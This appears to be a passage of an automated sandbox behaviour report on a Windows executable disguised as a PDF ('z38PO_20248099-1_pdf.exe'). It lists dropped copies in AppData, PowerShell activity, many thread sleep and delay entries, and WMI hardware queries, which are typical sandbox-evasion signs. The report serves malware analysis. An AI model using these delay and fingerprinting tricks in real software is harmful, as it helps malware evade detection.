                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe TID: 7056Thread sleep time: -593812s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe TID: 6172Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe TID: 1592Thread sleep time: -34126476536362649s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe TID: 1592Thread sleep time: -600000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe TID: 1592Thread sleep time: -599890s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe TID: 1592Thread sleep time: -599781s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe TID: 1592Thread sleep time: -599671s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe TID: 1592Thread sleep time: -599561s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe TID: 1592Thread sleep time: -599449s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe TID: 1592Thread sleep time: -599343s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe TID: 1592Thread sleep time: -599234s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe TID: 1592Thread sleep time: -599125s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe TID: 1592Thread sleep time: -599015s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe TID: 1592Thread sleep time: -598906s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe TID: 1592Thread sleep time: -598797s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe TID: 1592Thread sleep time: -598687s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe TID: 1592Thread sleep time: -598576s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe TID: 1592Thread sleep time: -598469s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe TID: 1592Thread sleep time: -598318s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe TID: 1592Thread sleep time: -598134s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe TID: 1592Thread sleep time: -598002s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe TID: 1592Thread sleep time: -597890s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe TID: 1592Thread sleep time: -597775s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe TID: 1592Thread sleep time: -597672s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe TID: 1592Thread sleep time: -597168s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe TID: 1592Thread sleep time: -597062s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe TID: 1592Thread sleep time: -596952s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe TID: 1592Thread sleep time: -596843s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe TID: 1592Thread sleep time: -596734s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe TID: 1592Thread sleep time: -596595s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe TID: 1592Thread sleep time: -596469s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe TID: 1592Thread sleep time: -596344s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe TID: 1592Thread sleep time: -596234s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe TID: 1592Thread sleep time: -596122s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe TID: 1592Thread sleep time: -596015s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe TID: 1592Thread sleep time: -595906s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe TID: 1592Thread sleep time: -595797s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe TID: 1592Thread sleep time: -595687s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe TID: 1592Thread sleep time: -595568s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe TID: 1592Thread sleep time: -594729s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe TID: 1592Thread sleep time: -594625s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe TID: 1592Thread sleep time: -594511s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe TID: 1592Thread sleep time: -594406s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe TID: 1592Thread sleep time: -594297s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe TID: 1592Thread sleep time: -594187s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe TID: 1592Thread sleep time: -594073s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe TID: 1592Thread sleep time: -593953s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe TID: 1592Thread sleep time: -593843s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe TID: 1592Thread sleep time: -593734s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe TID: 1592Thread sleep time: -593625s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe TID: 1592Thread sleep time: -593515s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe TID: 1592Thread sleep time: -593402s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe TID: 1592Thread sleep time: -593297s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe TID: 1592Thread sleep time: -593187s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 1832Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3240Thread sleep time: -27670116110564310s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3240Thread sleep time: -600000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7784Thread sleep count: 4235 > 30
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3240Thread sleep time: -599875s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7784Thread sleep count: 5217 > 30
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3240Thread sleep time: -599766s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3240Thread sleep time: -599641s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3240Thread sleep time: -599529s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3240Thread sleep time: -599422s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3240Thread sleep time: -599313s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3240Thread sleep time: -599188s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3240Thread sleep time: -599063s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3240Thread sleep time: -598938s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3240Thread sleep time: -598828s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3240Thread sleep time: -598719s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3240Thread sleep time: -598594s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3240Thread sleep time: -598484s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3240Thread sleep time: -598375s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3240Thread sleep time: -598155s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3240Thread sleep time: -598008s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3240Thread sleep time: -597906s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3240Thread sleep time: -597797s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3240Thread sleep time: -597688s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3240Thread sleep time: -597563s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3240Thread sleep time: -597438s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3240Thread sleep time: -597328s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3240Thread sleep time: -597219s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3240Thread sleep time: -597094s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3240Thread sleep time: -596984s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3240Thread sleep time: -596875s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3240Thread sleep time: -596766s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3240Thread sleep time: -596656s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3240Thread sleep time: -596547s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3240Thread sleep time: -596437s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3240Thread sleep time: -596328s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3240Thread sleep time: -596219s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3240Thread sleep time: -596094s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3240Thread sleep time: -595984s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3240Thread sleep time: -595869s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3240Thread sleep time: -595719s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3240Thread sleep time: -595608s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3240Thread sleep time: -595500s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3240Thread sleep time: -595371s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3240Thread sleep time: -595151s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3240Thread sleep time: -594985s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3240Thread sleep time: -594813s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3240Thread sleep time: -594656s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3240Thread sleep time: -594547s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3240Thread sleep time: -594437s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3240Thread sleep time: -594328s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3240Thread sleep time: -594200s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3240Thread sleep time: -594092s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3240Thread sleep time: -593982s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3240Thread sleep time: -593874s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3972Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5096Thread sleep time: -34126476536362649s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5096Thread sleep time: -600000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5096Thread sleep time: -599891s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5096Thread sleep time: -599766s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5096Thread sleep time: -599641s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5096Thread sleep time: -599516s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5096Thread sleep time: -599406s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5096Thread sleep time: -599297s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5096Thread sleep time: -599188s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5096Thread sleep time: -599063s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5096Thread sleep time: -598938s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5096Thread sleep time: -598828s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5096Thread sleep time: -598719s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5096Thread sleep time: -598594s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5096Thread sleep time: -598485s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5096Thread sleep time: -598360s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5096Thread sleep time: -598235s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5096Thread sleep time: -598110s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5096Thread sleep time: -597985s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5096Thread sleep time: -597860s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5096Thread sleep time: -597735s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5096Thread sleep time: -597610s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5096Thread sleep time: -597485s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5096Thread sleep time: -597360s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5096Thread sleep time: -597235s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5096Thread sleep time: -597110s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5096Thread sleep time: -596985s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5096Thread sleep time: -596860s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5096Thread sleep time: -596735s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5096Thread sleep time: -596610s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5096Thread sleep time: -596485s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5096Thread sleep time: -596360s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5096Thread sleep time: -596235s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5096Thread sleep time: -596110s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5096Thread sleep time: -595985s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5096Thread sleep time: -595860s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5096Thread sleep time: -595675s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5096Thread sleep time: -595562s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5096Thread sleep time: -595453s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5096Thread sleep time: -595339s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5096Thread sleep time: -595235s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5096Thread sleep time: -595110s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5096Thread sleep time: -594985s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5096Thread sleep time: -594860s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5096Thread sleep time: -594735s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5096Thread sleep time: -594610s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5096Thread sleep time: -594485s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5096Thread sleep time: -594360s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5096Thread sleep time: -594235s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5096Thread sleep time: -594110s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 5096Thread sleep time: -593985s >= -30000s
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 599859Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 599743Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 599625Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 599515Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 599406Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 599297Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 599187Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 599078Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 598963Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 598844Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 598733Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 598625Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 598462Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 598344Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 598234Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 598124Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 598013Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 597890Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 597781Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 597672Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 597562Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 597453Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 597343Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 597234Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 597125Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 597012Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 596890Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 596781Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 596672Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 596562Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 596453Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 596273Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 596156Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 596042Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 595890Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 595679Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 595534Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 595418Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 595294Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 595152Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 595031Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 594922Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 594812Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 594703Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 594593Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 594484Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 594375Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 594265Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 594156Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 594046Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 593936Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeThread delayed: delay time: 593812Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 600000
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 599890
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 599781
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 599671
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 599561
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 599449
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 599343
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 599234
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 599125
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeThread delayed: delay time: 599015
